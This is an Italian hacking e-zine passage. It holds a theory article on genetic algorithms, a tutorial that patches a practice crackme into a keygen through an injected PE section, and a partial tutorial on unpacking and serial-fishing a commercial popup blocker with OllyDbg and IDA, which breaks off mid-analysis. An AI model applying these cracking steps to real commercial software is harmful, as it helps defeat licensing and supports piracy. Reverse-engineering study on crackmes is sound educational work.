Dopo il il bruteforcing ho ottenuto : 79DE624C4B
Infine colgo l' occasione per salutare chiunque mi conosce.
Evilcry



+--------------------------------------------------------------[open the file]-+
|[ CRACK , REVERSING & CRITTOGRAFIA ]                                          | 
|-- Genetic Algorithms an overview #1                                          |
|-- Evilcry <evilcry@virgilio.it>                                              |
|                     _________________________________________________________| 
|____________________/  
Genetic Algorithms an overview #1
Lo   scopo  di  questo  articolo  (o  serie  di  articoli...poi  si  vedrà) è di
spiegare  a  grandi  linee  ed in maniera più o meno semplice  e  senza  l'  uso
eccessivo di matematica, che cosa sia un algoritmo genetico, come funziona, come
si  può  elaborare un algoritmo genetico, ed in fine grazie a questo  genere  di
algoritmi  vedremo  come  risolvere problemi  di  reversing  e  di  crittologia,
giudicati da molti impossibili da risolvere.
Concetto base di Algoritmo Genetico.
Da  qualche  anno a questa parte, hanno cominciato a fare la loro  comparsa  dei
sistemi  di computazione non deterministici, vale a dire basati fondamentalmente
sul  CASO. Tra questi sistemi abbiamo le di reti neurali, ed algoritmi biologici
(in grado di simulare il comportamento di un essere vivente), tra questi abbiamo
gli  Algoritmi  Genetici. Questo tipo di algoritmi viene usato nel  campo  della
scienza  per  risolvere problemi giudicati impossibili, trattando  le  possibili
soluzioni  come degli esseri viventi, che "subiscono" un'evoluzione  della  loro
specie.  Ciò  che  assicura  la risoluzione del problema  sta  nel  processo  di
EVOLUZIONE  nel  quale  come  dovreste sapere, vige  la  legge  della  SELEZIONE
NATURALE o LEGGE DEL PIU' FORTE, cioè solo gli esseri più forti (nel nostro caso
le  soluzioni  più adatte) sopravvivono. Esistono anche altri  fattori  come  la
mutazione  dei  geni,  il  mescolamento dei cromosomi, che  però  tratteremo  in
seguito.  Ritornando al discorso di prima, ogni possibile soluzione  può  essere
rappresentata come un insieme di parametri o GENI che spesso sono delle semplici
sequenze  di  bits, questi geni uniti formano una stringa di bits  che  è  detta
CROMOSOMA.  L'insieme  dei  parametri rappresentati  da  un  cromosoma  è  detto
GENOTIPO.  Il  genotipo è di fondamentale importanza perché al  suo  interno  si
trovano le informazioni per creare un altro individuo, quest' ultimo può  essere
chiamato  FENOTIPO (Fenotipo: caratteri visibili). Adesso andiamo a vedere  come
funziona un algoritmo generico:

1.  Per  prima  cosa  vengono creati un numero predefinito  di  Cromosomi  (cioè
possibili soluzioni) casuali, questo insieme di cromosomi è detto POPOLAZIONE.
LOOP fin quando non è stata trovata una soluzione valida:

2.  Si  testa  ogni singolo cromosoma per vedere quanto sia la  sua  affinità  a
resistere  alla  selezione,  e gli si assegna "un punteggio  d'adattamento  "  o
"Fitness Score".

3.  L'algoritmo sceglie due cromosomi o membri dalla popolazione, qui la  scelta
non  è  casuale  ma  è strettamente proporzionale all' indice di  affinità.  Per
questa scelta esistono vari metodi ed il più usato si chiama ROULETTE WHEEL.

4.  A  questo punto può avvenire il CROSSOVER (in biologia, scambio di materiale
genetico)  tra cromosomi scelti casualmente. Il crossover avviene tra genomi  ed
il risultato è un fenotipo.

5. Ogni cromosoma scelto viene analizzato anche in correlazione con l' INDICE DI
MUTAZIONE che ha potuto subire nello step.

6.  Ripete i passi 3, 4, 5 fin quando non abbiamo una nuova popolazione  con  lo
stesso numero di membri della prima popolazione.
FINE LOOP

Questo è un algoritmo genetico scritto in pseudo C:
main()
{
    int g;
    bool cycle = true;
    g = 0;                         // Generation Counter
    InizializePopulation(g);       // Crea la prima popolazine
    FitnessScore(g);               // Punteggio di adattamento
    while (cycle == true)
    {
        g++;
        Select(g);
        Crossover(g);
        Mutate (g);
        if (Evaluate(g) == 1)
        {
            cycle = false;
        }
    }
}

Fitness  Score significa come abbiamo detto prima è il punteggio di adattamento.
Infatti  in  natura  non tutti gli individui (nel nostro caso  le  soluzioni  al
problema)   sopravvivono,  qualcuno  muore  altri  anno   poca   affinità   alla
riproduzione  e quindi genereranno poca prole. Questo ci fa capire  che  i  geni
degli individui più adatti con il passare delle generazioni saranno trasmessi  a
ad  un  numero  sempre  maggiore di individui. Il  Fitness  di  un  individuo  è
determinato dalle performances del fenotipo. A ciò si può arrivare anche  grazie
alle  informazioni del padre (il genotipo), il quale a sua volta si può  dedurre
del cromosoma iniziale attraverso una funzione di fitness. Suona un pò difficile
eh?...  provate a rileggere il tutto con attenzione. Spesso ci possiamo  trovare
di  fronte a casi si SUPERFIT cioè individui la cui qualità è molto superiore  a
quella  dei  genitori  e  perciò potrebbero essere  delle  potenziali  soluzioni
definitive.
Crossover
Analizziamo  meglio  la parola Crossover, come abbiamo detto precedentemente  il
crossover  è  in  biologia lo scambio di materiale genetico tra  cromosomi.  Nel
nostro  caso  dobbiamo parlare di INDICE DI CROSSOVER ovvero la possibilità  che
hanno  due  cromosomi  scelti di scambiarsi i loro bits, solitamente  l'  indice
imposto  è  di  0.7  (questo  indice non è altro che la  probabilità  che  possa
avvenire un crossover). Dopo aver scelto due cromosomi dalla popolazione bisogna
vedere  se il loro crossover genererà un numero compreso tra 0 e 1. Nel caso  il
crossover  non  avvenga  si una duplicazione (o clone) della  soluzione  che  in
pratica sarebbe prettamente inutile ai nostri scopi. Sei il numero generato sarà
inferiore  all' indice di crossover (o crossover rate) allora bisogna  scegliere
in  modo  casuale  un punto, detto anche CUT POINT, nell' intera  lunghezza  del
cromosoma  e  quindi si effettua lo scambio di bits. Esistono varie tecniche  di
crossover,  ma il più usato in assoluto è il one point crossover,  cioè  vengono
presi  due  cromosomi e dopo averli accopiati vengono effettuati  due  tagli  in
punti  corrispondenti, ed in fine si scambiano le 2 sezioni (dette anche HEAD  e
TAIL).  Oltre  al one point crossover, esistono anche una serie di  multi  point
crossover  che intereffaso cioè due o più punti di taglio. Ma come ha dimostrato
DeJong  l'  ideale sarebbero 2 punti di taglio, se invece si adottano  crossover
con  più punti di taglio, questi faranno diminuire di molto l' efficienza  dell'
intereo GA.
Two-point  crossover:  In  tutti i multi-point crossover  i  due  cromosomi  non
vengono  presi  come  delle stringhe lineari, ma vengono  accoppiati  unendo  l'
estremità  di  uno  con l' estremità dell' altro in modo da formare  una  catena
circolare. I cromosomi messi in un anello circolare vengono detti segmenti.  Uno
dei  punti  di forza dei multi-point è che si possono intercambiare i  segmenti,
per  far  ciò è necessario che ci siano almeno due punti di taglio.Nel two-point
crossover, vengono applicati al cerchio due punti di taglio, il funzionamento  è
simile al one-point poichè viene cambiato un solo segmento.

Dati due cromosomi:
A ----> 10001001110010010
B ----> 01010001001000011
Si  sceglie casualmente una posizione attraverso la lunghezza dei cromosomi,  ad
esempio 10, e si fa avvenire lo scambio.
A ----> 10001001101000011
B ----> 01010001010010010

{{esempio preso da fupp}}
Convergenza
Un  algoritmo  genetico  può  essere considerato efficiente  quando  si  ha  una
regolare   crescita  della  CONVERGENZA,  cioè  quando  con  il  passare   delle
generazioni il fitness del miglior individuo sarà comune alla maggior parte  dei
membri  della  popolazione. In altre parole la convergenza  è  l'  evoluzione  o
meglio  progressione verso l' UNIFORMITA'. Un gene è convergente quando  il  95%
della  popolazione lo condivide (mi riferisco al gene), mentre  una  popolazione
converge quando tutti i geni convergono.
Mutation
Le tre leggi di Mendel:
1) Dominanza
2) Segregazione o disgiunzione (questa potrebbe causare elitismo e quindi deriva
genetica)
3) Assortimento
In ogni algoritmo genetico vedremo sempre una funzione di Mutation. La mutazione
ha  una  grande importanza perchè permette di reintrodurre valori e/o  soluzione
represse  durante  gli  altri stadi di sviluppo genetico,  come  ad  esempio  il
crossover. Inoltre la Mutation previene il rischio di DERIVA GENETICA  (cioè  ci
si allontana troppo dalle possibili soluzioni accettabili, questo soprattutto  a
causa  della  selezione naturale e del crossover), grazie all'  introduzione  di
elementi  di ricerca casuale nel range della popolazione. Iniziamo ora a  capire
lo  stretto  legame  che  esiste  tra crossover e mutazione,  effettivamente  la
mutazione  può  portare a profondi cambiamenti evolutivi. La mutazione  fornisce
perciò soluzioni migliori, ma non è molto performante, infatti un algoritmo  che
basa  la  sua  evoluzione  sulla mutazione sarà notevolmente  più  lento  di  un
algoritmo che usa il crossover. Inoltre con il passare delle generazioni aumenta
la  convergenza  delle soluzioni, e come afferma Davis con  l'  aumentare  della
convergenza  aumenta l' efficienza della mutazione. Se si decide di implementare
sia  crossover che mutation bisogna anche tenere conto dell' ELITISMO, cioè  del
fatto  che  con  il  progredire  delle generazioni  (cioè  il  rinnovarsi  delle
popolazioni) si rischia di perdere il o i cromosomi migliori (o per meglio  dire
le  soluzioni  migliori).  Per  ovviare all'  Elitismo  bisognerebbe  salvare  i
cromosomi  migliori  (ovviamente come ormai dovreste  aver  capito  i  cromosomi
migliori si riconoscono dal loro fitness ratio). Implementare il controllo sull'
elitismo  aumenta di molto le performances di un G.A. Ora analizziamo  cos'è  l'
indice  di mutazione che abbiamo visto nel passaggio 5. L'indice di mutazione  è
la  possibilità  che ha un cromosoma di mutare i suoi geni, nel nostro  caso  il
tipo  di cambiamento è facile da intuire poichè i bits possono essere o 0  o  1,
perciò  una  mutazione genica potrebbe solo invertirli. Di norma  l'  indice  di
mutazione  per i bits dev' essere molto basso, circa 0,001. Per questa mutazione
vengono  presi  i  cromosomi che hanno già effettuato un  crossover  e  dopo  un
successivo test che ha il compito di determinare se dev' essere applicata o meno
la mutazione.

Roulette Wheel
La  scelta dei cromosomi ai quali verrà applicato il crossover è di fondamentale
importanza,  perchè  permette  di  progredire  verso  stadi  di  evoluzione  più
avanzati,  che  cioè  più si avvicinano alla/alle soluzioni finali.  Solitamente
questo  processo  non  viene affidato al caso, ed il metodo  più  usato  per  l'
appunto  è  il  Roulette Wheel. Quest' ultimo opera una scelta dei membri  della
popolazione  (i cromosomi) basandosi essenzialmente sul loro fintess  score.  L'
unico  difetto  sta  nel  fatto  che il Roulette  Wheel  non  ci  garantisce  la
conservazione  degli  individui con un alto fitness  score,  causando  così  dei
problemi  di  elitismo  (vi  ricordo che l' elitismo in  casi  estremi  potrebbe
portare a problemi ben più gravi, come la deriva genetica). Perciò se si usa  il
roulette wheel è consigliabile inserire una funzione che protegga la popolazione
dall'  elitismo. Vediamo ora come funziona i linea di massima il roulette wheel.
Tutti i fitness score della popolazione sono mescolati casualmente o meglio sono
disposti,  sempre casualmente, su un' immaginaria roulette, poi ad  ogni  membro
della  popolazione  viene assegnata una regione o fetta di questa  roulette.  La
grandezza  di  questa fetta dipende direttamente dal fitness score  del  singolo
individuo,  maggiore  sarà  il suo fitness score e  maggiore  sarà  la  porzione
assegnatagli.  In fine per scegliere il cromosoma si lancia la  pallina  (questa
andrà  sempre  e solamente nella porzione che è stata scelta precedentemente)  e
quando questa si ferma si prende il cromosoma su cui si trova.
Siamo arrivati alla fine di questo primo tutorial sugli algoritmi genetici. Come
ben   potete  vedere  ho  parlato  solamente  da  un  punto  di  vista  teorico,
effettivamente questa prima potrebbe risultare un pò ostica perchè ho introdotto
i  concetti  teorici  fondamentali, che vi permetteranno di capire  i  contenuti
delle  prossime puntate. La prossima volta vedremo qualche applicazione  pratica
di quanto affermato sin qui.
References:
An Introduction to Genetic Algorithms, by Fupp
Vari articoli dalla rete
Ciao
Evilcry


+--------------------------------------------------------------[open the file]-+
|[ CRACK , REVERSING & CRITTOGRAFIA ]                                          |
|-- Trasformiamo un crackme in un generatore di chiavi!                        |
|-- active85k <active85k@hotmail.com>                                          |
|                     _________________________________________________________| 
|____________________/  
Trasformiamo un crackme in un generatore di chiavi!

Tools usati:
Prima di tutto simple.exe... il crackme usato come cavia
Un disassemblatore (consigliato IDA... almeno... io uso quello...)
Un programma per aggiungere una sezione al PE (io uso il mio PE-Section Maker :)
Un assemblatore qualsiasi (io uso il masm32)
Un editor di risorse (io uso il Resource Hacker)
Un pe editor (io uso il PEditor)

Let's start!
Inizia  questo nuovo tute! Lo scopo è quello di aggiungere del codice al crackme
in  modo  da trasformarlo in un generatore di chiavi! Beh? Che stiamo a  perdere
tempo? Forza su... disassembliamo l'eseguibile! Il programma vuole un nome e  un
serial fatto di numeri. Quindi iniziamo a cercare le chiamate per il ritiro  del
testo.  Abbiamo la prima GetDlgItemTextA in 00401507. Sappiamo quindi che ritira
il  nome  perché dopo c'è una GetDlgItemInt che indubbiamente ritira il  serial.
Dopo questa chiamata vediamo un
    cmp edi, 5
    ...
    jge short loc_0_40153D
Se  andiamo  avanti vediamo che ci dice che il nome deve essere lungo  almeno  5
caratteri...  e  comunqie il crackme stesso ce lo dice.  Quindi  per  proseguire
saltiamo a 0040153D. Tadà... troviamo l'algoritmo!
    loc_0_40153D: ; CODE XREF: .text:00401525 j
        push esi
         mov  ecx,  1  ;ECX sarà il nostro contatore (parte da 1  e  quindi  dal
secondo carattere!)
        xor esi, esi
        cmp edi, ecx
        jle short loc_0_401581
        mov ebx, 2
        lea edx, [esp+15h]
        push ebp
        sub ebx, edx

    loc_0_401555: ; CODE XREF: .text:00401574 j
        movsx eax, byte ptr [esp+ecx+17h] ;mette in EAX un carattere
         movsx ebp, byte ptr [esp+ecx+18h] ;mette in EBP il carattere successivo
ad EAX
        lea edx, [esp+ecx+18h]
        imul eax, ebp ;moltiplica i due caratteri
        add eax, ecx ;al risultato ci aggiunge il valore del contatore
        add edx, ebx
        add eax, esi
        imul eax, edx ;moltiplica il risultato per (contatore+1)
        inc ecx
        mov esi, eax
        cmp ecx, edi
        jl short loc_0_401555
        test esi, esi
        pop ebp
        jge short loc_0_40157D ;se il serial finale è minore di zero
        neg esi ;lo trasforma in positivo.
L'abbiamo anche analizzato anche se non ci interessa, non è questo lo scopo  del
nostro  tutorial! E' facilmente intuibile che ESI contiene il seriale valido  in
quanto  fa un controllo per vedere se è minore di zero e nel caso gli cambia  il
segno.  Questo perché un serial inserito dal programma può essere solo positivo.
Quindi  mi  sa  che è ora di agire! Alla locazione loc_0_40157D  più  in  basso,
possiamo  accorgerci  che l'analisi e la generazione del  seriale  è  finita  in
quanto dopo abbiamo la verifica e il messaggio che ci avvisa se abbiamo fatto un
buon  lavoro  oppure  se siamo lehim. Quindi mi sa che alla  locazione  0040157D
possiamo tranquillamente inserirci il nostro bel jump che ci porterà alla nostra
sezione  di codice! :D Adesso lasciamo stare un po' questo eseguibile e mettiamo
mano  al resource hacker. Apriamo le risorse dell'eseguibile (e precisamente  il
dialog  principale) e notiamo che l'edit riservato al serial ha  come  ID  1001.
Sappiamo  quindi  su  cosa  agire  ma ancora ci manca  l'handle  della  finestra
principale. Vabbè possiamo ricavarcelo in diversi modi, anche con una chiamata a
FindWindow. Quindi, pensiamo a mettere insieme i pezzi della nostra sezione! Per
prima  cosa  ci serve sapere l'indirizzo della GetProcAddress che ci  servirà  a
ritirare  gli address delle chiamate da utilizzare. Se apriamo con un PE  editor
il crackme, notiamo che nella import table manca la chiamata a GetProcAddress...
quindi  tocca a noi aggiungerla. Col PEditor andiamo nella it, tasto  destro  ->
Add   import.  Il  modulo  è  Kernel32.dll  e  la  funzione  si  chiama  proprio
GetProcAddress.    Oltre   alla   GetProcAddress   dobbiamo    aggiungere    una
GetModuleHandle. Una volta aggiunta, il peditor ci crea un file.txt che ci  dice
come fare per chiamarla specificandoci il suo indirizzo:
    GetProcAddress - call dword ptr [004050A9]
    GetModuleHandleA - call dword ptr [004050AD]
Abbiamo  quello  che ci serve! Ora mano all'assemblatore e scriviamo  il  nostro
codice!
         org  5000h  ;questo è indispensabile perché la nuova  sez.  partirà  da
0x6000
        jmp _skip_data ;inseriamo una tabella per memorizzare i dati

        setdlgitemint dd 0
        findwindow dd 0

        setdlgitemint_name db "SetDlgItemInt", 0
        findwindow_name db "FindWindowA", 0

        getprocaddress dd 0
        module_name db "user32.dll", 0
        hModule dd 0

        valid_serial dd 0
        window_name db "Simple Crackme", 0 ;il nome della finestra principale

    _skip_data:  ; inizio del codice
        mov [valid_serial], esi ;ricordate che ESI contiene il seriale valido?
        mov eax, 004050ADh ;GetModuleHandle
        push offset module_name
        call dword ptr [eax]
        mov [hModule], eax ;salviamo il modulo di user32.dll

        mov eax, 4050A9h
        mov eax, [eax]
        mov [getprocaddress], eax

        push offset setdlgitemint_name
        push [hModule]
        call [getprocaddress]
        mov [setdlgitemint], eax

        push offset findwindow_name
        push [hModule]
        call [getprocaddress]
        mov [findwindow], eax

        ;abbiamo preso quello che ci serve!

        push offset window_name
        push 0
        call [findwindow]

        push 0
        push [valid_serial]
        push 1001
        push eax
        call [setdlgitemint]

        pop eax      ;
        pop edi      ;
        pop ebx      ;
        add esp, 1Ch ;aggiusta lo stack
        ret ;fine
Che  figata!  La  nostra sezione di codice è finita! Andiamo  ad  assemblare  il
codice!  Una  volta assemblato il codice in un eseguibile qualsiasi,  andiamo  a
creare  la sezione in cui inserirlo in simple.exe con il PE-Section Maker.  Come
bytes  mettiamoci  200,  non  è  importante.  Importante  invece  è  mettere  le
caratteristiche con la proprietà "Writeable" perché ci memorizziamo  molte  cose
nella  sezione  stessa,  anche  se  all'interno  dello  spazio  tra  l'inizio  e
skip_data. Aggiunta la sezione, col peditor vediamo il suo Raw offset  (l'offset
all'interno  del  file) in modo da sapere dove inserire i nuovi  bytes.  Il  Raw
offset  è 0x5200. Andiamo quindi, con qualsiasi editor esadecimale a inserire  i
bytes precedentemente assemblati. Adesso dobbiamo mettere un jump alla locazione
precedentemente scelta che salti al virtual offset della nostra  nuova  sezione.
Siccome il virtual offset è 0x6000, il codice sarà così:
    mov eax, 00406000h
    jmp eax
Gli opcode quer queste due istruzioni sono:
    B8 00 60 40 00
    FF E0
Quindi dobbiamo andare ad inserirli alla locazione 0040157D. Ora... questo qua è
il  virtual  offset  in cui dobbiamo inserire i bytes, ma siccome  noi  dobbiamo
modificare il file e non la memoria, dobbiamo ricavarci il raw offset a  partire
dal   virtual.   Per   fare   questo,  dobbiamo   mettere   mano   all'imagebase
dell'eseguibile.  Sempre col caro peditor, notiamo che l'imagebase  è  uguale  a
0x00400000.  Per  questa  sezione  non ci  sono  grossi  problemi  perché  basta
sottrarre l'imagebase al virtual address per ottenere il raw address:
      0x0040157D -
      0x00400000 =
    ----------------
      0x0000157D
Ricavato  il  raw  offset,  andiamo  a  scriverci  gli  opcode.  Successivamente
mettiamoci  anche  qualche 90 (nop) per sicurezza....  A  questo  punto  abbiamo
veramente  finito...  oddio...  per  esser  sicuro  di  non  aver  fatto  errori
nell'header  del file, col peditor, posso correggere eventuali imperfezioni  dal
rebuilder  checkando  l'opzione  "Make PE  Header  win  NT/2K  compatible".  Ora
passiamo agli accorgimenti: col resource hacker, prendiamo il tasto "Register" e
rinominiamolo in "Keygen!" ;)Il gioco è fatto! Il generatore di chiavi  funziona
alla grande! L'esempio è Reversed.exe. Spero di esser stato chiaro al massimo  e
di non aver tralasciato niente. Alla prossima!
::[ active85k ]:: 


+--------------------------------------------------------------[open the file]-+
|[ CRACK , REVERSING & CRITTOGRAFIA ]                                          |
|-- Serial Fishing Popup Sweeper                                               |
|-- Graftal <macro_six3@hotmail.com>                                           |
|                     _________________________________________________________| 
|____________________/
Un gran bel "Hola" a tutti... :)
Partiamo  subito con un bel programmillo...+ utile ai nostri fini di   crackers,
ma  cmq  puo essere utile. E' simile al programma STOPZilla! di cui  ho  parlato
nel  numero  scorso di IL, in pratica pure lui chiude i popup...Ma  andiamo  per
ordine per favore...il disclaimer ecco! :P
____________
|DiSCLAiMER|
Every  reference  to facts, things or persons (virtual, real  or  esoteric)  are
purely  casual  and involuntary. Any trademark nominated here is  registered  or
copyright of their respective owners. The author of this manual does not  assume
any responsability on the content or the use of informations retriven from here;
he   makes  no  guarantee  of  correctness,  accuracy,  reliability,  safety  or
performance. This manual is provided "AS IS" without warranty of any  kind.  You
alone are fully responsible for determining if this page is safe for use in your
environment and for everything you are doing with it!

______________
|iNTRODUCTiON|

Allora,  prima  di  tutto  diciamo che questo tipo di  cracking  è  +  adatto  a
gentaglia  che  di cracking sa gia qualcosa, dato che il prog è  "relativamente"
"complesso". "Complesso" perché è criptato e scritto in  delphi, "relativamente"
perché  i  programmatori non si sono dati molto da  fare  e  quindi  abbiamo  il
compito moooolto facilitato.. :P Scoprirete perché  man mano che andiamo avanti.

______________________________
|LET'S SCREW THiS PROGRAM UP!|

_______
/PART 1!\
ok,  per primissima cosa, partiamo dal fatto che noi non sappiamo  assolutamente
nulla  di  questo  prog, e nemmeno che è criptato  quindi...Perfetto,  prendiamo
OllyDbg  e apriamo il file eseguibile  PopupSweeper.exe e vediamo che mentre  ce
lo  carica, OllyDbg dice che il file  è criptato o packato...Mhm, bene, la  cosa
comincia  a  farsi interessante. Ora  dobbiamo vedere con cosa  è  criptato...La
cosa + veloce è quella di prendere  l'eseguibile, rinominarlo in un txt, aprirlo
e leggere un po l'inizio dove  ci sarebbe il PE e vediamo se ci sono sezioni con
nomi  "strani"  che  ci   possano ricondurre a dei  cripter.  Nel  nostro  caso,
leggiamo  UPX0 e UPX1.  Uhm, bene bene, hanno utilizzato l'UPX per criptarlo.  E
ora  cosa  si  fa, come  si fa a unpackarlo? O scrivete su google  unUPX  o  UPX
unpacker  (dipende  da   come lo chiamano i vari siti)  oppure  +  semplicemente
andate  sul  sito   www.protools.cjb.net e cercato lì nella main  page  solo  la
parola             UPX..Scaricate           quindi            il            file
http://protools.anticrack.de/files/unpackers/brat_upxunp.zip                 per
esempio...Cercate  insomma,  non mi direte che  non  sapete  usare  internet  :P
Perfetto,  ora  dipende dall'unpacker che avete cmq. Diciamo che  se  è  uno  di
quelli  grafici,  allora apritelo e vedete un po come si usa  per  unpackare  il
file  (vi  consiglio  VIVAMENTE di fare un file di backup  di  PopupSweeper.exe)
oppure  se  è  uno  di  quei file da usare sotto dos, fate  che  metterlo  nella
cartella di windows e aprire una finestra dos, e lì scrivere il comando  proprio
dell'unpacker    che    avete,   che   puo    essere    simile    a    upx    -d
PopupSweeper.exe...Spero solo che il dos lo sappiate usare :P  okkkkk...Dovremmo
ora  avere il file bello che unpackato. Provatelo di nuovo  con OllyDbg e vedete
che funge =)) E la prima parte è fatta. Siete stati  bravi :)

_______
/PART 2!\
Perfetto,  siamo  ora  pronti per passare alla seconda  parte,  ovvero  troviamo
questo  serial! :) Per prima cosa, dobbiamo pensare a che metodo vogliamo usare.
Il  programma   ci  richiede  i soliti User/Serial e  ci  avvisa  di  un  serial
sbagliato  tramite   una  MessageBox. Per prima cosa, potremo  vedere  con  cosa
prende i dati  all'interno della DialogBox. Io purtroppo non sapevo cosa usa  il
programma.  Anzi, mi spiego meglio, so cosa usa, ma è poi un casino rintracciare
così  la  call che genera il serial, hehe :) Lascio a voi il compito di scoprire
questa  API  dai,  tanto  ai nostri fini non serve, solo  per  curiosita.  Anche
perché  è la curiosita che vi muove a crackare il programma, VERO?!? :P  Allora,
si  puo agire di "Forza Bruta" o usando il CERVELLO! Hehe, vi lascio  immaginare
che  cosa  abbia  usato  io come prima cosa...si, avete   indovinato...LA  FORZA
BRUTA! :D Ora capisco perché la mia prof di mate ci  dice sempre che "NON  USATE
IL CERVELLO!" =)) Direi cmq di esaminare i due casi, anche perché certe volte la
forza  bruta   puo  funzionare. Non in questo caso, ma cmq  vediamo  un  po:  ho
provato  a  mettere un bp su ogni funzione del prog per "setacciare" in  seguito
le  API  e  trovare quella che chiama la funzione per prendere il testo  da  una
edit  box.  Ho impiegato un po e alla fine ho trovato GetCaptureA. Bene, diciamo
che  non   è  propriamente un "equivalente" di GetDlgItemTextA o simili,  +  che
altro,  prende OGNI input da tastiera, anche il CTRL o ALT per intenderci.  Vedo
che cmq cio non mi porta da nessuna parte, allora clicco sul pulsante "Register"
e  setaccio  un  pochino anche qui per togliere il superfluo,  tipo  SetFocus  e
cavolate  cosi. Atterro su un GetActiveWindowA. Guardo nei registri e vedo   che
ce il testo di errore che andra poi a finire nella MessageBox di errore,  quindi
capisco di essere arrivato in "ritardo" e a questo punto mi rendo  conto che non
ho  +  voglia di usare la forza bruta perché mi pare  controproduttiva.  Apriamo
allora  la  nostra  fida  IDA e andiamo proprio dove   sta  il  GetActiveWindowA
ovvero:

CODE:0045608C sub_45608C      proc near               ; CODE XREF:
sub_4561F4+95p
CODE:0045608C                                         ; CODE:00469E3Dp ...
CODE:0045608C
CODE:0045608C Rect            = tagRECT ptr -54h
CODE:0045608C var_44          = dword ptr -44h
CODE:0045608C var_40          = dword ptr -40h
CODE:0045608C var_3C          = dword ptr -3Ch
CODE:0045608C var_38          = dword ptr -38h
CODE:0045608C var_34          = dword ptr -34h
CODE:0045608C var_1C          = dword ptr -1Ch
CODE:0045608C var_18          = dword ptr -18h
CODE:0045608C var_14          = dword ptr -14h
CODE:0045608C var_10          = dword ptr -10h
CODE:0045608C hWnd            = dword ptr -0Ch
CODE:0045608C var_8           = dword ptr -8
CODE:0045608C var_4           = dword ptr -4
CODE:0045608C arg_0           = dword ptr  8
CODE:0045608C
CODE:0045608C                 push    ebp
CODE:0045608D                 mov     ebp, esp
CODE:0045608F                 add     esp, 0FFFFFFACh
CODE:00456092                 push    ebx
CODE:00456093                 push    esi
CODE:00456094                 push    edi
CODE:00456095                 mov     edi, ecx
CODE:00456097                 mov     esi, edx
CODE:00456099                 mov     [ebp+var_4], eax
CODE:0045609C                 mov     ebx, [ebp+arg_0]
CODE:0045609F                 call    GetActiveWindow
CODE:004560A4                 mov     [ebp+hWnd], eax
CODE:004560A7                 push    2
CODE:004560A9                 mov     eax, [ebp+hWnd]
CODE:004560AC                 push    eax
CODE:004560AD                 mov     eax, ds:dword_46BF88
CODE:004560B2                 mov     eax, [eax]
CODE:004560B4                 call    eax
CODE:004560B6                 mov     [ebp+var_14], eax
CODE:004560B9                 push    2
CODE:004560BB                 mov     eax, [ebp+var_4]
CODE:004560BE                 mov     eax, [eax+30h]
CODE:004560C1                 push    eax
CODE:004560C2                 mov     eax, ds:dword_46BF88
CODE:004560C7                 mov     eax, [eax]
CODE:004560C9                 call    eax
CODE:004560CB                 mov     [ebp+var_18], eax
CODE:004560CE                 mov     eax, [ebp+var_14]
CODE:004560D1                 cmp     eax, [ebp+var_18]
CODE:004560D4                 jz      short loc_456136
CODE:004560D6                 mov     [ebp+var_44], 28h
CODE:004560DD                 lea     eax, [ebp+var_44]
CODE:004560E0                 push    eax
CODE:004560E1                 mov     eax, [ebp+var_14]
CODE:004560E4                 push    eax
CODE:004560E5                 mov     eax, ds:dword_46BECC
CODE:004560EA                 mov     eax, [eax]
CODE:004560EC                 call    eax
CODE:004560EE                 lea     eax, [ebp+Rect]
CODE:004560F1                 push    eax             ; lpRect
CODE:004560F2                 mov     eax, [ebp+var_4]
CODE:004560F5                 mov     eax, [eax+30h]
CODE:004560F8                 push    eax             ; hWnd
CODE:004560F9                 call    GetWindowRect
CODE:004560FE                 push    1Dh             ; uFlags
CODE:00456100                 push    0               ; cy
CODE:00456102                 push    0               ; cx
CODE:00456104                 mov     ecx, [ebp+var_34]
CODE:00456107                 mov     edx, [ebp+var_3C]
CODE:0045610A                 sub     ecx, edx
CODE:0045610C                 sar     ecx, 1
CODE:0045610E                 jns     short loc_456113
CODE:00456110                 adc     ecx, 0
CODE:00456113
CODE:00456113 loc_456113:
CODE:00456113                 add     ecx, edx
CODE:00456115                 push    ecx             ; Y
CODE:00456116                 mov     edx, [ebp+var_38]
CODE:00456119                 mov     eax, [ebp+var_40]
CODE:0045611C                 sub     edx, eax
CODE:0045611E                 sar     edx, 1
CODE:00456120                 jns     short loc_456125
CODE:00456122                 adc     edx, 0
CODE:00456125
CODE:00456125 loc_456125:
CODE:00456125                 add     edx, eax
CODE:00456127                 push    edx             ; X
CODE:00456128                 push    0               ; hWndInsertAfter
CODE:0045612A                 mov     eax, [ebp+var_4]
CODE:0045612D                 mov     eax, [eax+30h]
CODE:00456130                 push    eax             ; hWnd
CODE:00456131                 call    SetWindowPos
CODE:00456136
CODE:00456136 loc_456136:
CODE:00456136                 xor     eax, eax
CODE:00456138                 call    sub_44CE6C
CODE:0045613D                 mov     [ebp+var_10], eax
CODE:00456140                 call    sub_44CD88
CODE:00456145                 mov     [ebp+var_1C], eax
CODE:00456148                 mov     eax, [ebp+var_4]
CODE:0045614B                 call    sub_454FC8
CODE:00456150                 test    al, al
CODE:00456152                 jz      short loc_45615A
CODE:00456154                 or      ebx, 100000h
CODE:0045615A
CODE:0045615A loc_45615A:
CODE:0045615A                 xor     ecx, ecx
CODE:0045615C                 push    ebp
CODE:0045615D                 push    offset loc_4561E1
CODE:00456162                 push    dword ptr fs:[ecx]
CODE:00456165                 mov     fs:[ecx], esp
CODE:00456168                 push    ebx             ; uType
CODE:00456169                 push    edi             ; lpCaption
CODE:0045616A                 push    esi             ; lpText
CODE:0045616B                 mov     eax, [ebp+var_4]
CODE:0045616E                 mov     eax, [eax+30h]
CODE:00456171                 push    eax             ; hWnd
CODE:00456172                 call    MessageBoxA


Allora,  ho pensato di andare all'indetro come i gamberi per trovare  un  po  la
call  che  genera  quel  benedetto  serial.  Allora  vedo  che  su  IDA  proprio
all'inizio di cio che vi ho copiato qua ce scritto:

CODE:0045608C sub_45608C      proc near          ; CODE XREF:
sub_4561F4+95p
CODE:0045608C                                    ; CODE:00469E3Dp ...

Allora facciamo doppio clic su 00469E3D perché noi vogliamo risalire a cio   che
chiama  queste  funzioni  precendenti alla MsgBox  e  trovare  quindi  la  call.
Andiamo quindi e...TADAAAA! Cosa ce scritto?!?

CODE:00469E2C                 mov     ecx, offset aCongratulation ;
"Congratulations!"
CODE:00469E31                 mov     edx, offset aRegistrationWa ;
"Registration was successfully!\r\nThank y"...
CODE:00469E36                 mov     eax, ds:dword_46C03C
CODE:00469E3B                 mov     eax, [eax]
CODE:00469E3D                 call    sub_45608C;siamo qui

Hahha,  questo  è il testo della MsgBox di congratulazioni! :D Scommetto  che  o
prima o dopo ce anche quella di errore...e c.v.d (come volevasi dimostrare   :P)
ecco che poco + avanti troviamo:

